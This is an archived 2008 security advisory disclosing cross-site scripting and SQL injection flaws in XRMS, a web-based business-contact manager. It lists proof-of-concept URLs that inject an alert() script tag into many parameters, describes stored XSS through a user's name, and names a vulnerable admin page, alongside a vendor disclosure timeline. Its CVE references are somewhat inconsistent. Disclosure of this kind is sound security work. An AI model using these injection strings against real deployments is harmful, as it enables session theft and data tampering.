exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xrms-sqlxss.txt

xrms-sqlxss.txt
Posted Sep 4, 2008
Authored by Fabian Fingerle

XRMS suffers from multiple cross site scripting and SQL injection vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
advisories | CVE-2008-1129
SHA-256 | 0bdef0ca481ae19458dda409c2fc4ab97493d63d05ac6fccbf3c16f2f3b41027

xrms-sqlxss.txt

Change Mirror Download
Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities
in XRMS, CVE-2008-3664

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3664
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3664
http://xrms.sourceforge.net

Description

XRMS is a web-based application for managing business entities such as
employees, customers, contacts, activities with those contacts, etc.
The application is vulnerable to simple Cross Site Scripting, which can
be used for several isues

Example

Assuming XRMS is installed on http://localhost/xrms/, anybody could
inject JavaScript with:
http://localhost/xrms/login.php?target="><script>alert(1);</script>
http://localhost/xrms/activities/some.php?title="><script>alert(1);</script>
http://localhost/xrms/companies/some.php?company_name="><script>alert(1);</script>
http://localhost/xrms/contacts/some.php?last_name="><script>alert(1);</script>
http://localhost/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
http://localhost/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
http://localhost/xrms/cases/some.php?case_title="><script>alert(1);</script>
http://localhost/xrms/files/some.php?file_id="><script>alert(1);</script>
http://localhost/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>
...
A user could change their real name to <script>alert(1)</script>; will
be executed when the administrator looks at user list
A user could edit name/email of any user using SQL injection
vulnerbility in admin/users/self-2.php

Disclosure Timeline

2008-08-07 Vendor contacted
2008-09-04 Advisory published

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-XXXX to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with
help from Hanno Boeck).
This vulnerability relate to CVE-2008-1129
It's licensed under the creative commons attribution license.

Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de

--
_GPG_ 3D17 CAC8 1955 1908 65ED 5C51 FDA3 6A09 AB41 AB85
_chaos events near stuttgart_ www.datensalat.eu
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close